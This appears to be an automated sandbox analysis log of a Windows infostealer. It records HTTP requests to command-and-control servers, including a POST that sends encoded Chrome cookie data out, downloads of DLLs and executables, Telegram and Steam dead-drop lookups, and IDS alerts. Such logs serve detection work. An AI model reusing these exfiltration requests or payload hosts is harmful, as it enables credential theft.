Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIJKFHIJKKEBGCFBFHHost: urusvisa.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 63 35 37 30 36 63 33 37 62 30 66 35 66 30 30 34 31 36 63 30 39 34 33 36 64 35 34 36 63 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="token"9ec5706c37b0f5f00416c09436d546c7------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="mode"21------CAFIJKFHIJKKEBGCFBFH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKEHost: urusvisa.comContent-Length: 7593Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBHost: urusvisa.comContent-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 63 35 37 30 36 63 33 37 62 30 66 35 66 30 30 34 31 36 63 30 39 34 33 36 64 35 34 36 63 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 2d 2d 0d 0a Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="token"9ec5706c37b0f5f00416c09436d546c7------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="file_name"Q29va2llc

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 46.8.231.109 46.8.231.109
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49723 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49727 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49730 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49732 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49733 -> 147.45.44.104:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: underlinemdsj.site
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chaptermusu.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: possiwreeste.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: possiwreeste.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: underlinemdsj.site
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chaptermusu.store

Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00406963

Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=e24bf01cb1dccc3d2c_1091684912320142115
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=e24bf01cb1dccc3d2c_1091684912320142115
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2ae906657_snd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: urusvisa.com
Source: global traffic	DNS traffic detected: DNS query: files.veritas.org.ng
Source: global traffic	DNS traffic detected: DNS query: possiwreeste.site
Source: global traffic	DNS traffic detected: DNS query: famikyjdiag.site
Source: global traffic	DNS traffic detected: DNS query: commandejorsk.site
Source: global traffic	DNS traffic detected: DNS query: underlinemdsj.site
Source: global traffic	DNS traffic detected: DNS query: bellykmrebk.site
Source: global traffic	DNS traffic detected: DNS query: agentyanlark.site
Source: global traffic	DNS traffic detected: DNS query: writekdmsnu.site
Source: global traffic	DNS traffic detected: DNS query: delaylacedmn.site
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: chaptermusu.store
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: unknown

Source: RegAsm.exe, 0000001B.00000002.2762920375.000000000048F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Http://urusvisa.com:80/sql.dllFgqacPdLggz.exe
Source: RegAsm.exe, 00000012.00000002.3023059126.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dllU
Source: RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dllM
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php(w
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php1f9a9c4a2f8b514.cdf-ms
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php=
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpLxSt
Source: RegAsm.exe, 00000012.00000002.3023059126.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpexe
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpngPreference.Verb
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpq
Source: RegAsm.exe, 00000012.00000002.3023059126.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109s
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.GHCAAKEBKECB
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.EBKECB
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000003.00000002.2595193937.000000000148A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/G
Source: RegAsm.exe, 00000003.00000002.2595193937.000000000148A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/N
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgECB
Source: file.exe, 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoKEBKECB
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
